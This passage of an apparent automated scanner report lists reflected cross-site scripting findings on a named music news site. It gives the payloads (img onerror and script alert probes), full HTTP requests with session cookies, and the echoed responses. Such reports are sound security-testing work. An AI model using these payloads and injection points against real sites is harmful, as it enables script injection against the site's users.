User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=tjdmale1ipd1kabf4v5e0t4923; expires=Wed, 01-Jun-2011 17:36:28 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page-news news sufjan-stevens-suffered-nervous-breakdown903eb"><img src=a onerror=alert(1)>18c5063c5f6 sufjan-stevens-suffered-nervous-breakdown903eb">
...[SNIP]...

3.92. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8894e--><img%20src%3da%20onerror%3dalert(1)>b663ab7f7e8 was submitted in the REST URL parameter 2. This input was echoed as 8894e--><img src=a onerror=alert(1)>b663ab7f7e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown8894e--><img%20src%3da%20onerror%3dalert(1)>b663ab7f7e8 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=uusndr194g17tjf06aubb5lvi3; expires=Wed, 01-Jun-2011 17:36:48 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:03:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 67998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in view view-page-news news sufjan-stevens-suffered-nervous-breakdown8894e--><img src=a onerror=alert(1)>b663ab7f7e8 sufjan-stevens-suffered-nervous-breakdown8894e-->
...[SNIP]...

3.93. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2264"><a>e81bc81cde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown?c2264"><a>e81bc81cde1=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=b838s9pkc05rq8dmhsgk95k6a3; expires=Wed, 01-Jun-2011 17:34:20 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:01:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in ntype-news node social-links node 55436 two-sidebars" id="page-news-sufjan-stevens-suffered-nervous-breakdown?c2264"><a>e81bc81cde1=1">
...[SNIP]...

3.94. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bbab"><script>alert(1)</script>e0199fca83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown?9bbab"><script>alert(1)</script>e0199fca83b=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; expires=Wed, 01-Jun-2011 17:35:07 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:01:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown?9bbab"><script>alert(1)</script>e0199fca83b=1&amp;send=false&amp;layout=button_count&amp;width=100&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font=arial&amp;height=21" scrolling="no" frameborder="0" style="border:none; overf
...[SNIP]...

3.95. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1090"><a>da9ed195247 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitesa1090"><a>da9ed195247/all/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:04:54 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:04:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sitesa1090"><a>da9ed195247-all-themes-clash-favicon.ico">
...[SNIP]...

3.96. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f977"><a>af5a1119a31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all6f977"><a>af5a1119a31/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:07:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all6f977"><a>af5a1119a31-themes-clash-favicon.ico">
...[SNIP]...

3.97. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3415b"><a>260dbcb4f32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes3415b"><a>260dbcb4f32/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes3415b"><a>260dbcb4f32-clash-favicon.ico">
...[SNIP]...

3.98. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46042"><a>a2bcbcb7296 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes/clash46042"><a>a2bcbcb7296/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes-clash46042"><a>a2bcbcb7296-favicon.ico">
...[SNIP]...

3.99. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92e1"><a>ddaf3efe544 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/themes/clash/favicon.icob92e1"><a>ddaf3efe544 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-sites-all-themes-clash-favicon.icob92e1"><a>ddaf3efe544">
...[SNIP]...

3.100. http://www.clashmusic.com/user/a [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a92"><a>dbba4fc9041 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user35a92"><a>dbba4fc9041/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:14:29 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-user35a92"><a>dbba4fc9041-a">
...[SNIP]...

3.101. http://www.clashmusic.com/user/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 937e6--><img%20src%3da%20onerror%3dalert(1)>b86330b2446 was submitted in the REST URL parameter 2. This input was echoed as 937e6--><img src=a onerror=alert(1)>b86330b2446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/a937e6--><img%20src%3da%20onerror%3dalert(1)>b86330b2446 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:57 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user a937e6--><img src=a onerror=alert(1)>b86330b2446 a937e6-->
...[SNIP]...

3.102. http://www.clashmusic.com/user/a [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86a9"><img%20src%3da%20onerror%3dalert(1)>af52281002d was submitted in the REST URL parameter 2. This input was echoed as e86a9"><img src=a onerror=alert(1)>af52281002d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/ae86a9"><img%20src%3da%20onerror%3dalert(1)>af52281002d HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:47 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user ae86a9"><img src=a onerror=alert(1)>af52281002d ae86a9">
...[SNIP]...

3.103. http://www.clashmusic.com/user/a [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2cf1"><a>6d69f2fc0a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/a?f2cf1"><a>6d69f2fc0a7=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:14:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:14:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29973

